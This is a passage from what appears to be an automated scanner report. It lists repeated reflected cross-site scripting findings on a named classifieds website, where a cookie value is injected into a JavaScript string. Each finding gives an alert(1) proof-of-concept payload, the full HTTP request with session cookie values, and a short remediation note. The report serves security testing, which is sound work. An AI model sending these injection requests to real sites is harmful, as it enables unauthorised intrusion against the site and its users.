Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Browse/View-All HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedfe9e9'-alert(1)-'76139df7702;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd93'-alert(1)-'a70b478d26c was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Business-Office/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectededd93'-alert(1)-'a70b478d26c;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f211'-alert(1)-'bbbb72d90db was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Buy HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected4f211'-alert(1)-'bbbb72d90db;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc2f'-alert(1)-'f96e976d728 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CommunityPage/LandingPage HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedccc2f'-alert(1)-'f96e976d728;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f69'-alert(1)-'2b92f2ebc42 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DIY-Home-Renovations/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected64f69'-alert(1)-'2b92f2ebc42;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f3b9'-alert(1)-'33da9a4768a was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Garden-Outdoor-Living/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected2f3b9'-alert(1)-'33da9a4768a;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad994'%3balert(1)//a5b98d3ac20 was submitted in the SelectedState cookie. This input was echoed as ad994';alert(1)//a5b98d3ac20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Home HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedad994'%3balert(1)//a5b98d3ac20;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1971'-alert(1)-'57dd562bec7 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pets-Horses/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedf1971'-alert(1)-'57dd562bec7;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d94d'-alert(1)-'5528de391ec was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Real-Estate/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected2d94d'-alert(1)-'5528de391ec;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4291e'-alert(1)-'4552d9ada7 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Rural-Machinery/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected4291e'-alert(1)-'4552d9ada7;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caee7'%3balert(1)//c20cb122a55 was submitted in the SelectedState cookie. This input was echoed as caee7';alert(1)//c20cb122a55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Sell HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedcaee7'%3balert(1)//c20cb122a55;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2cb6'-alert(1)-'0fe791e9775 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Sell-Car/LandingPage HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedc2cb6'-alert(1)-'0fe791e9775;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89afa'-alert(1)-'c61ef295c08 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Sport-Leisure-Travel/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected89afa'-alert(1)-'c61ef295c08;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4419c'-alert(1)-'491d27d702a was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TrustAndSafety/LandingPage HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected4419c'-alert(1)-'491d27d702a;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca22'%3balert(1)//2700ad3c8c4 was submitted in the SelectedState cookie. This input was echoed as dca22';alert(1)//2700ad3c8c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Sell HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelecteddca22'%3balert(1)//2700ad3c8c4;